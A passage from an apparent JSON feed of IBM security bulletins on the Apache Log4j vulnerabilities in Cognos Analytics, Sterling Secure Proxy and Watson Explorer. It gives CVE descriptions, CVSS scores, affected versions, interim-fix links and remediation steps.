Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n13 Jan 2022 Updated Fix Version links for Bundle Customers to point to latest Interim Fixes that address Apache log4j vulnerabilities \n10 Jan 2022: Updated Fix Version titles to reflect updated latest IF version available. Updated the reference to the latest Security Bulletin that supersedes this one. Added more technical context to the Workarounds / Mitigations section and clarified the different links available in the Remediation / Fixes section. \n22 Dec 2021: IBM Cloud and Cloud Hosted instances remediation completion added to Remediation/Fixes \n21 Dec 2021: Modified Mitigation instructions to point to .jar and .pdf \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:29:59", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:29:59", "id": "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "href": "https://www.ibm.com/support/pages/node/6528388", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:07:39", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus Build 446| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \nIBM Sterling Secure Proxy| 6.0.2.0| iFix 04 Plus Build 232| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 6.0.3.0| iFix 01 Plus Build 142| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link also points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:05:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling Secure Proxy (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:05:15", "id": "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "href": "https://www.ibm.com/support/pages/node/6538674", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:08:30", "description": "## Summary\n\nApache Log4j is used by IBM Watson Explorer to log system events for diagnostics. This bulletin provides a remediation for the security vulnerabilities (CVE-2021-44832, CVE-2021-45105, and CVE-2021-45046) by upgrading IBM Watson Explorer to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| \n\n12.0.0.0, 12.0.0.1\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3 \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2 \n \n\n\n## Remediation/Fixes\n\n**Affected Products**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8\n\n| Upgrade to Version 12.0.3.9. \n\nSee [Watson Explorer Version 12.0.3.9 Foundational Components](<https://www.ibm.com/support/pages/node/6539806>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 Analytical Components](<https://www.ibm.com/support/pages/node/6539808>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| 12.0.0.0, 12.0.0.1, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 oneWEX](<https://www.ibm.com/support/pages/node/6539804>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n\nSee [Watson Explorer Version 11.0.2.13 Foundational Components](<https://www.ibm.com/support/pages/node/6539814>) for download information and instructions. \n \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n \nSee [Watson Explorer Version 11.0.2.13 Analytical Components](<https://www.ibm.com/support/pages/node/6539816>) for download information and instructions. \n \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3| \n\n 1. If you have not already installed, install Version 12.0.3. For information about Version 12.0.3, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/docview.wss?uid=ibm10880811>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.0&platform=All&function=all>): **12.0.3.0-WS-WatsonExplorer-DAEAnalytical-CAStudio-IF002.**\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2| \n\n 1. If you have not already installed, install Version 11.0.2.2. \n\n * For information about Version 11.0.2, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/pages/node/724425>).\n * For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>).For information about Version 11.0.2.2, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.2&platform=All&function=all>): **11.0.2.2-WS-WatsonExplorer-AEAnalytical-CAStudio-IF002**.\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS8NLW\",\"label\":\"Watson Explorer\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.0.0, 11.0.1, 11.0.2, 12.0.0, 12.0.1, 12.0.2, 12.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T12:14:51", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Watson Explorer is vulnerable to arbitrary code execution (CVE-2021-44832, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T12:14:51", "id": "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "href": "https://www.ibm.com/support/pages/node/6540528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:52", "description": "## Summary\n\nIBM Cognos Analytics is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Analytics has upgraded Apache Log4j to v2.17.1 Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.2.1 Interim Fix 3 \\(Bundled\\)\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<https://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.0.13 Interim Fix 5 \\(Bundled\\)\" ) \n \n \nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n \nThe required remediation will be applied during the standard monthly IBM Cognos Analytics on Cloud maintenance window January 15, 2022\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526474> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \\(CVE-2021-44228\\)\" )\n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j 